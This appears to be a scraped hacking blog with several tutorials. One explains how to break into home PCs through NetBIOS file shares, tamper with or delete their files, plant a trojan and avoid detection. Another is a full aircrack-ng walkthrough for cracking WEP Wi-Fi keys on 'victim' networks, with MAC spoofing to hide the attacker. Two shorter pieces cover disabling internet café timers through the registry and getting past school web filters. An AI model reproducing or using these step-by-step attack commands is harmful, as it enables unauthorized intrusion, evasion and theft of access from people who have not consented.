NETSTAT is, so you can use that to your advantage. Most PC systems are kind of
hard to hack using this method now because they are more secure and can tell when
another system is trying to gain access. Also, besure that you (somehow) know
whether they are running a firewall or not because it will block the connection to
their computer. Most home systems aren't running a firewall, and to make it better,
they don't know how operate the firewall, therefore, leaving the hole in the system.
To help you out some, it would be a great idea to pick up on some programming
languages to show you how the computer reads information and learn some things on
TCP/IP (Transfer Control Protocol/Internet Protocol) If you want to find out
whether they are running a firewall, simply hop on a Proxy and do a port scan on their
IP. You will notice if they are running a firewall because most ports are closed. Either
way, you still have a better chance of hacking a home system than hacking Microsoft.
Gaining Access

7. Once you have added this to you LMHOST file. You are basically done. All you need
to do is go to:
Start
Find
Computer
Once you get there you simply type the IP address or the host name of the system.
When it comes up, simply double click it, and boom! There's a GUI for you so you
don't have to use DOS anymore. You can use DOS to do it, but it's more simple and
fun this way, so that's the only way i put it. When you open the system you can edit,
delete, rename, do anything to any file you wish. I would also delete the command file
in C:/ because they may use it if they think someone is in their computer. Or simply
delete the shortcut to it. Then here's when the programming comes in handy. Instead
of using the NBTSTAT method all the time, you can then program you own trojan on
your OWN port number and upload it to the system. Then you will have easier access
and you will also have a better GUI, with more features. DO NOT allow more than one
connection to the system unless they are on a faster connection. If you are
downloading something from their computer and they don't know it and their
connection is being slow, they may check their NETSTAT to see what is connected,
which will show your IP and make them suspicious. Thats it. All there is to it. Now go
out and scan a network or something and find a computer with port 21 or something
open.

Hacking WEP wifi passwords

Hacking WEP wifi passwords

1. Getting the right tools

Download Backtrack 3. It can be found here:

http://www.remote-exploit.org/backtrack_download.html

The Backtrack 4 beta is out but until it is fully tested (especially if you are a noob) I
would get the BT3 setup. The rest of this guide will proceed assuming you downloaded
BT3. I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and
reboot your computer into BT3. I always load into the 3rd boot option from the boot
menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st
option so be ready. The 1st option boots too slowly or not at all so always boot from
the 2nd or 3rd. Experiment to see what works best for you.
2. Preparing the victim network for attack

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole"
window. Now we must prep your wireless card.

Type:
airmon-ng

You will see the name of your wireless card. (mine is named "ath0") From here on out,
replace "ath0" with the name of your card.
Now type:

airmon-ng stop ath0
then type:
ifconfig wifi0 down
then:
macchanger --mac 00:11:22:33:44:55 wifi0
then:
airmon-ng start wifi0

What these steps did was to spoof (fake) your mac address so that JUST IN CASE
your computeris discovered by someone as you are breaking in, they will not see your
REAL mac address. Moving on...

Now it's time to discover some networks to break into.
Type:
airodump-ng ath0

Now you will see a list of wireless networks start to populate. Some will have a better
signal than others and it is a good idea to pick one that has a decent signal otherwise
it will take forever to crack or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:
hold down ctrl and tap c

This will stop airodump from populating networks and will freeze the screen so that
you can see the info that you need.

**Now from here on out, when I tell you to type a command, you need to replace
whatever is in parenthesis with what I tell you to from your screen. For example: if i
say to type:
-c (channel)
then dont actually type in
-c (channel)

Instead, replace that with whatever the channel number is...so, for example you would
type:
-c 6
Can't be much clearer than that...lets continue...

Now find the network that you want to crack and MAKE SURE that it says the
encryption for that network is WEP. If it says WPA or any variation of WPA then
move on...you can still crack WPA with backtrack and some other tools but it is a
whole other ball game and you need to master WEP first.

Once you've decided on a network, take note of its channel number and bssid. The
bssid will look something like this --> 05:gk:30:fo:s9:2n
The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:
airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

the FILE NAME can be whatever you want. This is simply the place that airodump is
going to store the packets of info that you receive to later crack. You don't even put
in an extension...just pick a random word that you will remember. I usually make mine
"wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, you must have
different file names for each one or it won't work. I usually just name them wepkey1,
wepkey2, etc.

Once you typed in that last command, the screen of airodump will change and start to
show your computer gathering packets. You will also see a heading marked "IV" with a
number underneath it. This stands for "Initialization Vector" but in noob terms all
this means is "packets of info that contain clues to the password." Once you gain a
minimum of 5,000 of these IV's, you can try to crack the password.

I've cracked some right at 5,000 and others have taken over 60,000. It just depends
on how long and difficult they made the password.

Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well,
don't worry, now we are going to trick the router into giving us HUNDREDS of IV's
per second.

3. Actually cracking the WEP password
Now leave this Konsole window up and running and open up a 2nd Konsole window. In
this one type:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is
gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what
these mean...just know that these are your meal tickets. Now you just sit and wait.
Once your computer finally gathers an ARP request, it will send it back to the router
and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to
happen within seconds...sometimes you have to wait up to a few minutes. Just be
patient. When it finally does happen, switch back to your first Konsole window and
you should see the number underneath the IV starting to rise rapidly. This is great!
It means you are almost finished! When this number reaches AT LEAST 5,000 then
you can start your password crack. It will probably take more than this but I always
start my password cracking at 5,000 just in case they have a really weak password.
Now you need to open up a 3rd and final Konsole window. This will be where we
actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in
between it and -01.cap here. Type it as you see it. So for me, I would type
wepkey-01.cap

Once you have done this you will see aircrack fire up and begin to crack the password.
typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If
this is the case, aircrack will test what you've got so far and then it will say
something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will
stay running...it is just letting you know that it is on pause until more IV's are
gathered. Once you pass the 10,000 mark it will automatically fire up again and try to
crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it
finally gets it.

If you do everything correctly up to this point, before too long you will have the
password! now if the password looks goofy, dont worry, it will still work. some
passwords are saved in ASCII format, in which case, aircrack will show you exactly
what characters they typed in for their password. Sometimes, though, the password
is saved in HEX format in which case the computer will show you the HEX encryption
of the password. It doesn't matter either way, because you can type in either one
and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon
after every 2 characters. So for instance if the password was "secret", it would be
displayed as:

se:cr:et

This would obviously be the ASCII format. If it was a HEX encrypted password that
was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF

Just omit the colons from the password, boot back into whatever operating system
you use, try to connect to the network and type in the password without the colons
and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few
successful attempts, you will get very quick with it. If I am near a WEP encrypted
router with a good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal
activity that you do, falls completely on you because...technically...this is just for you
to test the security of your own network. :-)

I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE
WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY
ANSWERED. No one wants to hold your hand through this...read the tut and go
experiment until you get it right.

There are rare occasions where someone will use WEP encryption with SKA as well.
(Shared Key Authentication) If this is the case, additional steps are needed to
associate with the router and therefore, the steps I lined out here will not work. I've
only seen this once or twice, though, so you probably won't run into it. If I get
motivated, I may throw up a tut on how to crack this in the future.

Sunday, 7 October 2012

How to get unlimited time in Internet Café's

How to get unlimited time in Internet Café's
Today we're going to learn how to disable the timer on the computers in Internet
Cafe's.

Let's go through the steps, shall we?

1. Create a New Text Document.
2. Then type CMD in it.

3. And then save it as anything.bat
(Make sure the file do NOT end on .txt, but on .bat)
4. Go to the location were you saved the .bat file and run it. If you've done this
correctly, you'll see that Command Prompt is open.

5. Now that Command Prompt is open, type in: cd\windows
(This will change the directory to Windows)
6. Then type in: regedit
(This will get you to the registry editor gui)

7. Now navigate to:
HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current
version>internet settings>policies>system

8. Then on the right pane where it says Disable Taskmanager, right click on it, and
scroll down to modify, and than change the value of it to "0".

9. And then open Windows Task Manager
(CTRL+ALT+DELETE)

10. And then disable the Internet Cafe's timer.

If you did this right, then you're done! Well done :D

How to get past your school blocking system without programs

Right, first off, you need to go onto: http://g.ho.st/

This is a virtual machine/ computer that your sysadmins shouldn't have blocked. At
my school, our security is pretty high because of people like me and you.

After you
are on the website, it should look like this:
Ok, now you click on the big button that says:

Start.

Then, after that, you should see
another screen that looks like this:
Now make an account, you should see the register button.

I have made an account,
(trust me, it is easy). After you have logged in,

you should see another screen that
looks something like this:
After you have got logged in, you should try and get on the g.ho.st internet (alpha), to
get on the internet, follow these commands.
on the desktop, click on the icon that says: find cool web stuff.
Then click the icon that says: Web.
Now go to: Ghost services.
And there should be a icon that says: G.ho.st browser (alpha).
(If you go on a website, and it says: open in a new tab because this site will function
better, (or something like that) don't do it. But if you want to, just do it).

Pages

Thursday, 11 October 2012

Tuesday, 9 October 2012

Sunday, 7 October 2012